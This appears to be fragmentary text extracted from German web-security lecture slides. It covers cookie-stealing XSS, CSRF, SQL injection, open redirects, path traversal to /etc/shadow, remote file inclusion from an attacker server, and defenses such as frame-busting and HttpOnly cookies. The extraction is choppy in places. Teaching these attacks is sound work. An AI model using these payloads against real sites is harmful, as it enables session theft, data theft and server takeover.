http://onlineshop.de/index.php?session=9970ac048cb8b
Quelle: Wikipedia
& → &
)var img = document.createElement('img');
img.src = 'keksdose.php?cookie=' + btoa(document.cookie);
document.body.appendChild(img);
<?php $name = $_REQUEST['name']; ?>
<html> Hello, <?= $name; ?>! </html>
<img>
)<img src="http://blog.de/admin/delete.php?id=1">
Quelle: Smashing Magazine
<!-- From http://www.ft.com/ -->
<style id="antiClickjack"> body { display: none !important; } </style>
<script type="text/javascript">
if (self === top) {
var antiClickjack = document.getElementById("antiClickjack");
antiClickjack.parentNode.removeChild(antiClickjack);
} else {
top.location = self.location;
}
</script>
:visiteddefiniert.
Quelle: XKCD
SELECT * FROM users WHERE name = '$user' AND pwd = '$pwd'
// name = Alf, pwd = katze
SELECT * FROM users WHERE name = 'Alf' AND pwd = 'katze'
// name = x' OR 1=1;#
SELECT * FROM users WHERE name = 'x' OR 1=1;#' AND pwd = '';
extension:php mysql_query $_GET
http://www.normal.de?redirect=http://boese.com
http://some_site.com/../../../../etc/shadow
http://some_site.com/get-files?file=/etc/passwd
Quelle: xssed.com
include_once ($phpbb_root_path . 'common.php');
forum.de/plugin.php&phpbb_root_path=http://meinServer.de/
The FBI claims to have found the server’s location without the NSA’s help, simply by fiddling with the Silk Road’s login page until it leaked its true location.
The FBI Finally Says How It ‘Legally’ Pinpointed Silk Road’s Server
secure
: Werden nur bei sicherer Verbindung (HTTPS) übertragenHttpOnly
: Können nicht per JavaScript gelesen oder bearbeitet werden (document.cookie
)